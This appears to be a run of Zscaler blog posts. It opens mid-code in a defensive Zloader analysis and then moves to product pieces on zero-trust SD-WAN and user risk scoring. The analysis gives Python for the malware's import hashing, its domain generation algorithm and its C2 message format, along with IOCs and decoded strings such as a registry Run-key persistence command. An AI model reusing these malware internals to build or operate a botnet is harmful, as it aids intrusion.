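    for element in func_name.upper():
        checksum = 16 * checksum + ord(element) + 1          # same as 16*c - (0 - (ord+1))
        if checksum & 0xF0000000:                            # fold the overflow nibble back in
            checksum = (((checksum & 0xF0000000) >> 24) ^ checksum) & 0x0FFFFFFF
    return checksum ^ xor_constant


def build_hash_table(export_names, xor_constant):
    """Precompute checksum -> name for every export, recording collisions for review."""
    table, collisions = {}, []
    for name in export_names:
        h = calculate_checksum(name, xor_constant)
        if h in table and table[h] != name:
            collisions.append((h, table[h], name))
        table[h] = name
    return table, collisions


def resolve_imports(checksums, export_names, xor_constant):
    """Map checksums recovered from a sample to API names; unknown ones keep their hex value."""
    table, _ = build_hash_table(export_names, xor_constant)
    return [table.get(h, "UNKNOWN_%08x" % h) for h in checksums]


def recover_xor_constant(observed_checksum, known_api_name):
    """If one resolved call is known (e.g. from a debugger session), the XOR constant is
    the unkeyed checksum of that name XORed with the value stored in the sample."""
    return calculate_checksum(known_api_name, 0) ^ observed_checksum


if __name__ == "__main__":
    stored = [calculate_checksum(n, SAMPLE_XOR_CONSTANT) for n in ("LoadLibraryA", "VirtualAlloc")]
    print(resolve_imports(stored, SAMPLE_EXPORTS, SAMPLE_XOR_CONSTANT))
```

Because the final step is a plain XOR, recovering the constant needs only one call whose target is known; after that, the same table resolves every other checksum in the sample. Collisions are rare with a 28-bit checksum but are reported rather than silently overwritten, so the analyst sees where a resolution is ambiguous.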
The encryption key differs between samples and is also hardcoded in the .rdata section, as shown in Figure 3 below.

Figure 3. Example string obfuscation key used by Zloader

A list of Zloader’s obfuscated strings is shown in the Appendix.

Static configuration encryption and structure

The Zloader static configuration is still encrypted using RC4 with a hardcoded alphanumeric key, but the structure is slightly different. The botnet ID, campaign name, and command-and-control servers (C2s) are set at fixed offsets, in addition to an RSA public key that replaces the old RC4 key that was used for network encryption. ThreatLabz has observed 15 unique new Zloader samples, and all of them have the same RSA public key, likely indicating there is currently only a single threat actor using the malware.

An example Zloader static configuration is shown below.

```
00000000  00 00 00 00 42 69 6e 67 5f 4d 6f 64 35 00 00 00  |....Bing_Mod5...|
00000010  00 00 00 00 00 00 00 00 00 4d 31 00 00 00 00 00  |.........M1.....|
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 74  |..............ht|
00000030  74 70 73 3a 2f 2f 61 64 73 6c 73 74 69 63 6b 65  |tps://adslsticke|
00000040  72 68 69 2e 77 6f 72 6c 64 00 00 00 00 00 00 00  |rhi.world.......|
00000050  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
*
000002b0  00 00 00 00 00 00 00 00 02 00 00 00 01 00 00 00  |................|
000002c0  2d 2d 2d 2d 2d 42 45 47 49 4e 20 50 55 42 4c 49  |-----BEGIN PUBLI|
000002d0  43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 66 4d  |C KEY-----.MIGfM|
000002e0  41 30 47 43 53 71 47 53 49 62 33 44 51 45 42 41  |A0GCSqGSIb3DQEBA|
000002f0  51 55 41 41 34 47 4e 41 44 43 42 69 51 4b 42 67  |QUAA4GNADCBiQKBg|
00000300  51 44 4b 47 41 4f 57 56 6b 69 6b 71 45 37 54 79  |QDKGAOWVkikqE7Ty|
00000310  4b 49 4d 74 57 49 38 64 46 73 61 0a 6c 65 54 61  |KIMtWI8dFsa.leTa|
00000320  4a 4e 58 4d 4a 4e 49 50 6e 52 45 2f 66 47 43 7a  |JNXMJNIPnRE/fGCz|
00000330  71 72 56 2b 72 74 59 33 2b 65 78 34 4d 43 48 45  |qrV+rtY3+ex4MCHE|
00000340  74 71 32 56 77 70 70 74 68 66 30 52 67 6c 76 38  |tq2Vwppthf0Rglv8|
00000350  4f 69 57 67 4b 6c 65 72 49 4e 35 50 0a 36 4e 45  |OiWgKlerIN5P.6NE|
00000360  79 43 66 49 73 46 59 55 4d 44 66 6c 64 51 54 46  |yCfIsFYUMDfldQTF|
00000370  30 33 56 45 53 38 47 42 49 76 48 71 35 53 6a 6c  |03VES8GBIvHq5Sjl|
00000380  49 7a 37 6c 61 77 75 77 66 64 6a 64 45 6b 61 48  |Iz7lawuwfdjdEkaH|
00000390  66 4f 6d 6d 75 39 73 72 72 61 66 74 6b 0a 49 39  |fOmmu9srraftk.I9|
000003a0  67 5a 4f 38 57 52 51 67 59 31 75 4e 64 73 58 77  |gZO8WRQgY1uNdsXw|
000003b0  49 44 41 51 41 42 0a 2d 2d 2d 2d 2d 45 4e 44 20  |IDAQAB.-----END |
000003c0  50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a  |PUBLIC KEY-----.|
000003d0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
*
000003fc
```

Domain generation algorithm

When the primary C2 server is not available, Zloader reverts to a DGA. The DGA algorithm has changed in the latest version and no longer contains a different seed per botnet. Python code that replicates Zloader’s new DGA algorithm is shown below.

```python
import time
from datetime import datetime, timedelta


def uint32(val):
    return val & 0xffffffff


def get_dga_time():
    # Seed: the local system date at midnight, expressed as a UTC Unix timestamp
    now = datetime.now()
    ts = time.time()
    utc_offset = (datetime.fromtimestamp(ts) - datetime.utcfromtimestamp(ts)).total_seconds() / 3600
    midnight = now.replace(hour=0, minute=0, second=0, microsecond=0)
    midnight = midnight + timedelta(hours=utc_offset)
    return int(midnight.timestamp())


def generate_zloader_dga_domains():
    domains = []
    t = get_dga_time()
    for i in range(32):  # number of domains to generate
        domain = ""
        for j in range(20):  # domain name length
            v = uint32(ord('a') + (t % 25))
            t = uint32(t + v)
            # Rotate the 32-bit state left by 8 bits
            t = (t >> 24) & ((t >> 24) ^ 0xFFFFFF00) | uint32(t << 8)
            domain += chr(v)
        domains.append(domain + ".com")
    return domains
```

Code sample available on GitHub.

The code generates 32 domains per day by using the local system time at midnight (converted to UTC) as a seed.
Each DGA domain is 20 characters long, followed by the ".com" TLD.

Network communications
Zloader continues to use HTTP POST requests to communicate with its C2 server. However, the network encryption now uses 1,024-bit RSA together with RC4 and the Zeus "visual encryption" algorithm. Zloader uses the custom Zeus BinStorage format: the first 128 bytes (one RSA-1024 block) are the RSA-encrypted RC4 key (32 random bytes), and the remaining bytes are encrypted with that RC4 key and visual encryption, as shown in Figure 4.
Figure 4. Zloader BinStorage object for a hello message (prior to encryption)
The Zeus BinStorage structure uses an integer ID to identify each stored item, followed by its length and data. The BinStorage ID values in this example are shown in Table 1.

Value (Decimal)   Value (Hexadecimal)   Description
10002             0x2712                Botnet ID
10025             0x2729                Campaign ID
10001             0x2711                Bot ID
10003             0x2713                Malware version
10006             0x2716                Unknown flag (set to 0x1)
Table 1. Zloader BinStorage hello message fields

ThreatLabz has observed samples containing the following botnet IDs:
Bing_Mod2
Bing_Mod3
Bing_Mod4
Bing_Mod5
All of the campaign IDs have been set to the value M1.

Conclusion
Zloader was a significant threat for many years and its comeback will likely result in new ransomware attacks. The operational takedown temporarily stopped the activity, but not the threat group behind it. Returning after almost two years, Zloader has brought notable improvements to the loader module such as RSA encryption, an updated DGA, and enhanced obfuscation techniques, with more junk code, API import hashing, and string encryption to thwart malware analysis. Zscaler ThreatLabz continues to track this threat and add detections to protect our customers.
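Both the static configuration and the C2 traffic sit behind RC4, so one added example serves the two sections above (it is not ThreatLabz's code). It implements RC4, pulls the fields out of a decrypted configuration at the offsets visible in the dump, and packs and parses a BinStorage hello message with the Table 1 IDs. Everything the post does not state is an assumption and marked as such: the field offsets (botnet ID 0x04, campaign ID 0x19, first C2 URL 0x2e, PEM key 0x2c0, total size 0x3fc) are read from the dump and only the first C2 slot is parsed, since the dump shows a single server; BinStorage items are modelled as a 32-bit little-endian ID, a 32-bit length and the data, the simplest reading of "ID, followed by length and data"; and the 128-byte RSA-wrapped session key and the visual-encryption pass are not implemented, so the RC4 session key is handed in directly. The RC4 keys, the C2 URL and the hello values are constructed sample data.

```python
"""RC4, Zloader static-config extraction and BinStorage parsing (added example)."""
from __future__ import annotations

import struct

# Offsets read from the decrypted config dump in the post (assumptions, see lead-in).
CFG_SIZE, OFF_BOTNET, OFF_CAMPAIGN, OFF_C2, OFF_RSA_KEY = 0x3fc, 0x04, 0x19, 0x2e, 0x2c0
# BinStorage IDs from Table 1.
ID_BOT, ID_BOTNET, ID_VERSION, ID_FLAG, ID_CAMPAIGN = 10001, 10002, 10003, 10006, 10025
RSA_HEADER_LEN = 128  # one RSA-1024 block holding the wrapped 32-byte RC4 key


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xff
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xff
        j = (j + s[i]) & 0xff
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xff])
    return bytes(out)


def _cstr(buf: bytes, off: int) -> str:
    """NUL-terminated ASCII string starting at off."""
    return buf[off:buf.index(b"\x00", off)].decode("ascii")


def parse_static_config(encrypted: bytes, rc4_key: bytes) -> dict:
    """RC4-decrypt the embedded config and read the fixed-offset fields."""
    plain = rc4(rc4_key, encrypted)
    if len(plain) != CFG_SIZE:
        raise ValueError("unexpected config size")
    return {
        "botnet_id": _cstr(plain, OFF_BOTNET),
        "campaign_id": _cstr(plain, OFF_CAMPAIGN),
        "c2": _cstr(plain, OFF_C2),
        "rsa_public_key_pem": _cstr(plain, OFF_RSA_KEY),
    }


def binstorage_pack(items: dict[int, bytes]) -> bytes:
    """<u32 id><u32 length><data> per item (assumed layout)."""
    return b"".join(struct.pack("<II", i, len(v)) + v for i, v in items.items())


def binstorage_unpack(blob: bytes) -> dict[int, bytes]:
    items, off = {}, 0
    while off + 8 <= len(blob):
        item_id, length = struct.unpack_from("<II", blob, off)
        off += 8
        if off + length > len(blob):
            raise ValueError("truncated BinStorage item")
        items[item_id] = blob[off:off + length]
        off += length
    return items


def decrypt_hello(message: bytes, session_key: bytes) -> dict[int, bytes]:
    """Skip the 128-byte RSA header and RC4-decrypt the BinStorage body.
    Visual encryption is not undone here (not implemented in this example)."""
    if len(message) < RSA_HEADER_LEN:
        raise ValueError("message shorter than the RSA header")
    return binstorage_unpack(rc4(session_key, message[RSA_HEADER_LEN:]))


def build_sample_config() -> bytes:
    """Constructed config laid out like the post's dump; values are placeholders."""
    buf = bytearray(CFG_SIZE)
    for off, val in ((OFF_BOTNET, b"Bing_Mod5"), (OFF_CAMPAIGN, b"M1"),
                     (OFF_C2, b"https://c2.example.invalid"),
                     (OFF_RSA_KEY, b"-----BEGIN PUBLIC KEY-----\nPLACEHOLDER\n-----END PUBLIC KEY-----\n")):
        buf[off:off + len(val)] = val
    return bytes(buf)


SAMPLE_CFG_KEY = b"k7Qp2ZxV9mLa3Rt8"      # constructed alphanumeric config key
SAMPLE_SESSION_KEY = bytes(range(32))    # constructed 32-byte RC4 session key
SAMPLE_HELLO = {ID_BOTNET: b"Bing_Mod5", ID_CAMPAIGN: b"M1", ID_BOT: b"HOST_0123ABCD",
                ID_VERSION: struct.pack("<I", 0x02010000), ID_FLAG: struct.pack("<I", 1)}


def demo():
    cfg = parse_static_config(rc4(SAMPLE_CFG_KEY, build_sample_config()), SAMPLE_CFG_KEY)
    wire = b"\x00" * RSA_HEADER_LEN + rc4(SAMPLE_SESSION_KEY, binstorage_pack(SAMPLE_HELLO))
    return cfg, decrypt_hello(wire, SAMPLE_SESSION_KEY)


if __name__ == "__main__":
    cfg, hello = demo()
    print(cfg["botnet_id"], cfg["campaign_id"], cfg["c2"])
    print(hello)
```

Against a real sample the RC4 key comes from the binary, the plaintext of the first 128 bytes can only be recovered with the operator's private key, and the visual-encryption layer has to be removed before binstorage_unpack() will see valid headers; the length check in binstorage_unpack() is what catches a body that was decrypted with the wrong key or still has that layer applied.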
Zscaler Coverage
In addition to sandbox detections, Zscaler's multilayered cloud security platform detects indicators related to Zloader at various levels with the following threat name:
Win64.Downloader.Zloader

Indicators Of Compromise (IOCs)

SHA256                                                            Description
038487af6226adef21a29f3d31baf3c809140fcb408191da8bc457b6721e3a55  Zloader sample
16af920dd49010cf297b03a732749bb99cc34996f090cb1e4f16285f5b69ee7d  Zloader sample
25c8f98b79cf0bfc00221a33d714fac51490d840d13ab9ba4f6751a58d55c78d  Zloader sample
2cdb78330f90b9fb20b8fb1ef9179e2d9edfbbd144d522f541083b08f84cc456  Zloader sample
83deff18d50843ee70ca9bfa8d473521fd6af885a6c925b56f63391aad3ee0f3  Zloader sample
98dccaaa3d1efd240d201446373c6de09c06781c5c71d0f01f86b7192ec42eb2  Zloader sample
adbd0c7096a7373be82dd03df1aae61cb39e0a155c00bbb9c67abc01d48718aa  Zloader sample
b206695fb128857012fe280555a32bd389502a1b47c8974f4b405ab19921ac93  Zloader sample
b47e4b62b956730815518c691fcd16c48d352fca14c711a8403308de9b7c1378  Zloader sample
d92286543a9e04b70525b72885e2983381c6f3c68c5fc64ec1e9695567fb090d  Zloader sample
eb4b412b4fc58ce2f134cac7ec30bd5694a3093939d129935fe5c65f27ce9499  Zloader sample
f03b9dce7b701d874ba95293c9274782fceb85d55b276fd28a67b9e419114fdb  Zloader sample
f6d8306522f26544cd8f73c649e03cce0268466be27fe6cc45c67cc1a4bdc1b8  Zloader sample
fa4b2019d7bf5560b88ae9ab3b3deb96162037c2ed8b9e17ea008b0c97611616  Zloader sample
fbd60fffb5d161e051daa3e7d65c0ad5f589687e92e43329c5c4c950f58fbb75  Zloader sample

URL                              Description
https://adslstickerhi[.]world    Zloader C2
https://adslstickerni[.]world    Zloader C2
https://dem.businessdeep[.]com   Zloader C2

Appendix
Tools
The code snippets in this blog have also been uploaded to our GitHub tools repository here.
Decoded strings
user32.dll
nbsp;
%s
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /t REG_SZ /v %s /d "%s"
wininet.dll
td
tr
br
Software\Microsoft\
h3
Local\
hr
POST
gdiplus.dll
NtWriteVirtualMemory
https://
*
\??\
ntdll.dll
ws2_32.dll
_alldiv
NtProtectVirtualMemory
NtGetContextThread
shell32.dll
%s %s
psapi.dll
crypt32.dll
S-1-15
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
_aulldiv
\"%s\"
samlib.dll
S:(ML;CIOI;NRNWNX;;;LW)
NtCreateThreadEx
regsvr32.exe /s \"%s\"
NtResumeThread
bcrypt.dll
netapi32.dll
RtlGetVersion
strtoul
winsta.dll
wldap32.dll
NtReadVirtualMemory
Basic
0:0
version.dll
h2
InstallDate
h5
NtAllocateVirtualMemory
.com
cabinet.dll
S:(ML;;NRNWNX;;;LW)
li
kernel32.dll
%s\tmp_%08x
h6
aeiouy
div
rpcrt4.dll
{%08X-%04X-%04X-%08X%08X}
iphlpapi.dll
mpr.dll
C:\Windows\System32\ntdll.dll
Connection: close
gdi32.dll
C:\Windows\System32\msiexec.exe
Global\
wtsapi32.dll
NtCreateUserProcess
shlwapi.dll
RtlUserThreadStart
%s
NtOpenProcess
HTTP/1.1
ncrypt.dll
INVALID_BOT_ID
_aullrem
Software\Microsoft\Windows\CurrentVersion\Run
dnsapi.dll
ole32.dll
.dll
C:\Windows\SysWOW64\msiexec.exe
bcdfghklmnpqrstvwxz
ftllib.dll
User metrics
ThreadStart
MSIMG32.dll
\*
JKLMNOPQRSTUVW$$$$$$XYZ[\]^_`abcdefghijklmnopq
h1
NtSetContextThread
*/*
GET
userenv.dll
urlmon.dll
Software\Microsoft\Windows NT\CurrentVersion
_ThreadStart@4
dxgi.dll
NtOpenSection
script
/post.php
advapi32.dll
h4
secur32.dll
imagehlp.dll
%s_%s_%X
winscard.dll

References
1. The Curious Case of an Unknown Trojan Targeting German-Speaking Users
2. Dismantling ZLoader: How malicious ads led to disabled security tools and ransomware (Microsoft Security Blog)

Fri, 19 Jan 2024 15:41:37 -0800 Santiago Vicente

Introducing Zero Trust SASE

The evolution of work and IT
Workplaces are rapidly evolving and hybrid work has become the new normal. Legacy network architectures were designed around a static model of work where users were in fixed locations.
Today's branches look very different — with hoteling desks, co-working spaces, a mobile workforce, and internet-centric connectivity. As branches evolve, so too must the networking infrastructure used to connect them — one size no longer fits all.

Legacy networks introduce risk & complexity
The traditional model of connectivity is very network-centric — users, devices and servers connect to a network, and the network grants access to every other device on the same network. This model has too much implicit trust — any device can talk to any other device or server by default, enabling the lateral movement of threats and attacks such as ransomware. Network-centric connectivity also requires extending the network into public clouds and third parties using VPN tunnels, which can expand your attack surface into infrastructure that you do not directly control. Along with the proliferation of IoT devices in organizations, attack surface management becomes increasingly complex. Relying on routed overlays and traditional routing protocols also introduces additional complexity into networks.

Traditional SD-WAN is not zero trust
SD-WANs also take a network-centric approach and build routed overlays using site-to-site VPN tunnels and routing protocols. While they allow organizations to move away from expensive MPLS networks and solve many operational challenges, they introduce security risks by facilitating lateral movement. Controlling these risks requires network-based segmentation, which often necessitates additional firewall appliances at the branch and complex network-based security policies.
Zero trust is a cybersecurity strategy that assumes every entity is untrusted by default — and only allows access to certain resources based on identity, context, and posture. This is fundamentally opposed to the way traditional networks work. We could limit the trust inherent in traditional networks through techniques like segmentation and admission control, but these approaches can dramatically increase complexity. It's time for a new approach — built on zero trust principles.

Introducing Zero Trust SD-WAN
I previously announced our Branch Connector appliances for connecting branches through the Zero Trust Exchange. Today I am excited to announce Zero Trust SD-WAN — an industry-first zero trust solution for securely connecting branches, factories, hospitals, retail locations, and data centers — that eliminates the security risks of traditional SD-WANs. Using lightweight virtual machines or plug & play appliances coupled with the Zscaler Zero Trust Exchange, Zero Trust SD-WAN provides secure inbound and outbound zero trust networking for locations, without overlay routing, additional firewall appliances or policy inconsistencies. Fully integrated with our industry-leading SSE platform, Zero Trust SD-WAN enables robust security and simplifies branch network management.
We are also pleased to announce general availability of our Z-Connector plug & play appliances — ZT 400, ZT 600 and ZT 800. Along with a lightweight virtual machine form factor, these appliances can support a wide range of customer requirements, ranging from 200 Mbps to multi-gigabit. With pre-provisioned config templates and zero touch provisioning, deploying a new branch can be as simple as plugging in an internet connection.

New gateway capabilities
The Zero Trust SD-WAN solution can be deployed in two modes: as a Forwarder, or as a Gateway. The Forwarder mode enables customers with existing WAN solutions to implement a zero trust overlay by deploying Z-Connector appliances next to their existing routers and switches. Relevant traffic can be directed to the Z-Connector appliances through conditional DNS resolution or policy-based routing.
The Gateway mode terminates the ISP connection directly on the Z-Connector appliance, eliminating the need for additional routers or firewalls. The Z-Connector acts as the default gateway for the site, forwarding all traffic to the Zscaler Zero Trust Exchange, which provides secure connectivity to internet, SaaS, and private applications. Gateway mode supports rich WAN and LAN management capabilities, including dual ISP termination, app-aware path selection with ISP monitoring, high availability (active-active, active-passive), multiple LAN subnets, local firewall, integrated DHCP server, and DNS gateway. Zero Trust SD-WAN gateway capabilities will be available starting February 2024.

Zero Trust SD-WAN reduces complexity and risk
Zero Trust SD-WAN solves many critical challenges for our customers. Here are a few key use cases:
Replace site-to-site VPNs: Avoid complex VPN configurations and route table management and eliminate the risk of lateral threat movement.
Accelerate M&A integrations: Connect users to apps across organizations without merging routing domains or deploying NAT gateways. Reduce integration time from months to days.
Secure OT connectivity: Eliminate VPNs and exposed ports for vendor remote access to OT resources.
IoT discovery & classification: Discover and secure IoT devices on the network with AI-powered classification engines.
To learn more about these use cases, read our blog on bringing zero trust to branches.

Industry-first SASE platform built on zero trust
Secure Access Service Edge (SASE) is a term coined by Gartner to describe the convergence of networking and security to align with modern IT infrastructure and working patterns. While SASE embraces zero trust principles, many SASE solutions in the market simply bolt on traditional SD-WAN to an SSE service, with zero trust principles limited to user-to-app access. This still leaves sites exposed with too much implicit trust.
With the introduction of Zero Trust SD-WAN, Zscaler is proud to deliver the industry's first single-vendor SASE platform built on zero trust and AI. Zero Trust SASE enables organizations to extend zero trust beyond just users, to branches, factories and data centers. Building on the strengths of our SSE platform — the Zero Trust Exchange — Zero Trust SASE reduces cost and complexity by eliminating traditional security and networking solutions.

Transform your branch networks
Legacy WAN architectures no longer work. The industry-wide disruptions around hybrid work and zero trust security present a unique opportunity to rethink and transform your network architecture. Zero Trust SD-WAN and SASE take a radically different approach to connecting users, devices, and apps without the risk of lateral threat movement. Visit our SASE resources page for additional product information, white papers and videos, and read more about our Zero Trust SD-WAN capabilities here.

Mon, 22 Jan 2024 17:50:01 -0800 Naresh Kumar

How Zscaler's Dynamic User Risk Scoring Works

Access control policies aim to balance security and end user productivity, yet often fall short due to their static nature and limited ability to adapt to evolving threats. But what if there was an easy way to automate access control per user, considering individual risk factors and staying up-to-date with the latest advanced attacks?
Zscaler User Risk Scoring takes dynamic access control and risk visibility to the next level, using records of previous behavior to determine future risk. Similar to how insurance companies use driving records to determine car insurance rates, or banks use credit scores to assess loan eligibility, user risk scoring leverages previous behavior records to assign risk scores to individual users. This allows organizations to set dynamic access control policies based on various risk factors, accounting for the latest threat intelligence.
User risk scoring empowers organizations to restrict access to sensitive applications for users with a high risk score until their risk profile improves. By considering factors such as past victimization by cyberattacks, near-misses with malicious content, or engagement in behavior that could lead to a breach, organizations can ensure that access control policies are tailored to individual risk profiles.
Figure: Organizations can set user risk thresholds to allow or deny access to both private and public applications.

How does user risk scoring work?
User risk scoring plays a crucial role across the Zscaler platform, driving policies for URL filtering, firewall rules, data loss prevention (DLP), browser isolation, and Zscaler Private Access (ZPA), and feeding into overall risk visibility in Zscaler Risk360. By leveraging user risk scores within each of these security controls, organizations can better protect all incoming and outgoing traffic from potential threats.
Figure: URL filtering rules are one way that risk scoring can be applied to policies within Zscaler Internet Access (ZIA).
The risk scoring process consists of two components: the static (baseline) risk score and the real-time risk score. The static risk score is established based on a one-week lookback at risky behavior and is updated every 24 hours. The real-time risk score modifies this baseline every 2 minutes throughout the day, updating whenever a user interacts with known or suspected malicious content. Each day at midnight, the real-time risk score is reset.
Zscaler considers more than 65 indicators that influence the overall risk score. These indicators fall into three major categories: pre-infection behavior, post-infection behavior, and more general suspicious behavior. The model accounts for the fact that not all incidents are equal; each indicator has a variable contribution to the risk score based on the severity and frequency of the associated threat.
Pre-infection behavior indicators encompass a range of blocked actions that would have led to user infection, such as blocked malware, known and suspected malicious URLs, phishing sites, pages with browser exploits, and more. Post-infection behavior indicators include things like detected botnet traffic or command-and-control traffic, which show that a user/device has already been compromised. Suspicious behavior indicators are similar to pre-infection indicators but are less severe (and less certain to lead to infection), covering policy violations and risky activities like browsing deny-listed URLs, DLP compliance violations, anonymizing sites, and more.
*A more detailed sampling of these indicators is included at the bottom of this article.

How can Zscaler customers use risk scoring?
User risk scores can be found in the analytics and policy administration menus of both Zscaler Internet Access (ZIA) and Zscaler Private Access (ZPA). They are also woven together with a range of additional inputs in Zscaler Risk360, which allows security teams to delve deeper into their organization's holistic risk.
Figure: Organizations can monitor risk scores for individuals and for the overall organization.
Zscaler also has deep integrations with many leading security operations tools, allowing the same telemetry and incident alert context that feeds into risk scoring to be shared with tools like SIEM, SOAR, and XDR via a REST API to streamline workflows. These scores can be used to:

Drive access control policies
User risk scoring gives network and security teams a powerful tool for driving low-maintenance zero trust access control policies, controlling both incoming and outgoing internet and application traffic. It can be combined with other dynamic rulesets (e.g., device posture profiles) and static rulesets (e.g., URL and DNS filtering and app control policy) to protect organizations from breaches without unnecessarily restricting user productivity.
Figure: User risk, device posture, and other access policies work together to optimize secure access.

Monitor overall organizational risk and key factors that can be improved
Admins can monitor their company risk over time to assess the top areas of overall company risk and prioritize remediation efforts. They can see how risk scores are distributed across users and locations, and can benchmark their risk score against other companies in their industry.
Figure: Company risk scores can be analyzed over time against industry benchmarks.

Monitor risky users on an individual basis and understand how (and why) their risk is trending
If a user's risk score spikes, admins can take action, whether that be isolating that user's machine to deal with an active threat, or simply training a user that certain behaviors are posing an unacceptable risk.
Figure: Admins can analyze individual users and drill down into specific incidents.

Overall, Zscaler User Risk Scoring, with its categorization of threats and aggregation of logs, offers valuable insights into an organization's security posture. By understanding the different types of risks and behaviors associated with cyberthreats, organizations can implement dynamic access control policies and proactively protect their critical assets and data. With risk scoring, organizations can navigate the ever-changing threat landscape with confidence. To learn about more of Zscaler's unique inline security capabilities, check out our Cyberthreat Protection page.
Sample Indicators for User Risk Scoring
· Pre-infection behavior includes a range of blocked actions that would have likely led a user to be infected, such as:
  o Malware blocked by Zscaler's Advanced Threat Protection or inline Sandbox
  o Blocked known and suspected malicious URLs
  o Blocked websites with known and suspected phishing content
  o Blocked pages with known browser exploits
  o Blocked known and suspected adware and spyware
  o Blocked pages with a high PageRisk score
  o Quarantined pages
  o Blocked files with known vulnerabilities
  o Blocked emails containing viruses
  o Detected mobile app vulnerabilities
· Post-infection behavior includes a range of blocked actions that were attempted after a user was infected, such as:
  o Botnet traffic
  o Command-and-control traffic
· Suspicious behavior includes policy violations and other risky sites, files, and conditions that could lead to infection, such as:
  o Deny-listed URLs
  o DLP compliance violations
  o Pages with known dangerous ActiveX controls
  o Pages vulnerable to cross-site scripting attacks
  o Possible browser cookie theft
  o Internet Relay Chat (IRC) tunneling use
  o Anonymizing sites
  o Blocks or warnings from secure browsing about an outdated/disallowed component
  o Peer-to-peer (P2P) site denials
  o Webspam sites
  o Attempts to browse blocked URL categories
  o Mobile app issues, including denial of the mobile app, insecure user credentials, location information leaks, personally identifiable information (PII), information identifying the device, or communication with unknown servers
  o Tunnel blocks
  o Fake proxy authentication
  o SMTP (email) issues, including rejected password-encrypted attachments, unscannable attachments, detected or suspected spam, rejected recipients, DLP blocks or quarantines, or blocked attachments
  o IPS blocks of cryptomining & blockchain traffic
  o Reputation-based blocks of suspected adware/spyware sites
  o Disallowed use of a DNS-over-HTTPS site

Fri, 19 Jan 2024 05:00:01 -0800 Mark Brozek